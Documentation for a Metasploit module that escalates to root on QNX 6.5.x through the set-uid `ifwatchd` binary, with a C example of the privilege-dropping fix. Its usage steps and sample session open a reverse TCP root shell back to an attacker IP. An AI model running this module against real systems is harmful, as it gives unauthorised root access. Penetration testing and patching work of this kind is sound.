## Description

  This module attempts to gain root privileges on QNX 6.4.x and 6.5.x
  systems by exploiting the `ifwatchd` suid executable.


## Vulnerable Application

  `ifwatchd` allows users to specify scripts to execute using the `-A`
  command line argument; however, it does not drop privileges when
  executing user-supplied scripts, resulting in execution of arbitrary
  commands as root.
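
  The mitigation for this class of bug, as an added example (generic POSIX code, not QNX's `ifwatchd` source or any vendor patch): a set-uid-root helper drops to the invoking user's IDs and verifies the drop before it executes a caller-supplied script. The function names `drop_privileges` and `run_user_script` are hypothetical, and the code assumes a POSIX system that provides `setgroups()`.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1   /* exposes setgroups() on glibc */
#endif
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Permanently give up set-uid-root privileges; returns 0 on success, -1 on failure. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();

    /* Order matters: groups and gid must go while euid is still 0. */
    if (geteuid() == 0 && setgroups(1, &rgid) != 0) return -1;
    if (setgid(rgid) != 0) return -1;
    if (setuid(ruid) != 0) return -1;

    /* Verify: an unprivileged caller must not be able to get root back. */
    if (ruid != 0 && (setuid(0) == 0 || seteuid(0) == 0)) return -1;
    if (geteuid() != ruid || getegid() != rgid) return -1;
    return 0;
}

/* Run a caller-supplied event script as the invoking user.
 * Returns the script's exit status, 126 if the drop failed, 127 if exec failed, -1 on error. */
int run_user_script(const char *script, const char *ifname)
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (drop_privileges() != 0) _exit(126);  /* fail closed */
        execl(script, script, ifname, (char *)NULL);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s <script> <ifname>\n", argv[0]);
        return 2;
    }
    return run_user_script(argv[1], argv[2]);
}
```

  With this pattern the `id` output of a script started by the helper shows no `euid=0(root)` entry, because the effective and saved IDs were reset before `execl()`.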

  This module has been tested successfully on:

  * QNX Neutrino 6.5.0 (x86)
  * QNX Neutrino 6.5.0 SP1 (x86)

  QNX Neutrino 6.5.0 Service Pack 1 is available here:

  * http://www.qnx.com/download/feature.html?programid=23665


## Verification Steps

  1. Start `msfconsole`
  2. `use exploit/qnx/local/ifwatchd_priv_esc`
  3. `set session <ID>`
  4. `run`
  5. You should get a *root* session


## Options

  **SESSION**

  The session to run this module on. List available sessions with `sessions`.

  **WritableDir**

  Path to a writable directory on the target file system. (default: `/tmp`)


## Scenarios

  ```
  msf5 > use exploit/qnx/local/ifwatchd_priv_esc
  msf5 exploit(qnx/local/ifwatchd_priv_esc) > set session 1 
  session => 1
  msf5 exploit(qnx/local/ifwatchd_priv_esc) > set lhost 172.16.191.188
  lhost => 172.16.191.188
  msf5 exploit(qnx/local/ifwatchd_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.188:4444 
  [*] Writing interface arrival event script...
  [*] Executing /sbin/ifwatchd...
  [*] Command shell session 2 opened (172.16.191.188:4444 -> 172.16.191.215:65500) at 2018-03-22 15:18:48 -0400

  id
  uid=100(test) gid=100 euid=0(root)
  uname -a
  QNX localhost 6.5.0 2012/06/20-13:50:50EDT x86pc x86
  ```

